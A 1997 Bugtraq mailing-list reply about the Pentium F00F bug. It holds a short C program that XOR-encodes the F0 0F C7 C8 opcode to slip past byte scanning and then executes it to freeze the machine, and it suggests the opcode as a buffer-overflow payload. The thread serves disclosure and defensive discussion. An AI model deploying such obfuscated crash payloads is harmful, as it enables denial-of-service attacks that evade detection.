[5544] in bugtraq
Re: Intel Pentium Bug
daemon@ATHENA.MIT.EDU (Tim Newsham)
Mon Nov 10 18:59:33 1997
Date: Mon, 10 Nov 1997 12:44:15 -1000
Reply-To: Tim Newsham <newsham@LAVA.NET>
From: Tim Newsham <newsham@LAVA.NET>
X-To: root@SAFFRONCS.COM
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <Pine.LNX.3.95.971109193537.3288A-100000@cayenne.saffroncs.com>
from "Jason Parsons" at Nov 9, 97 07:39:10 pm
> Re the F0 0F C7 C8 Pentuim bug:
>
> I just wanted ot repost this from the Linux-security list. Thought it
> might be helpful to some here. This was posted to Linux-security by Sam
> Trenholme <set@reality.samiam.org>.
[useless perl script deleted]
As I mentioned in another forum, NO, this is NOT useful.
main() {
static int code = 0x48478f70, xor = 0x80808080;
code ^= xor;
((int (*)())&code)();
}
On a side note: this single-word opcode could be used in cases
where writing a buffer overflow exploit is hard. Now instead of
just crashing the per-session server, or the entire server, you get to
crash the whole machine.
Tim N.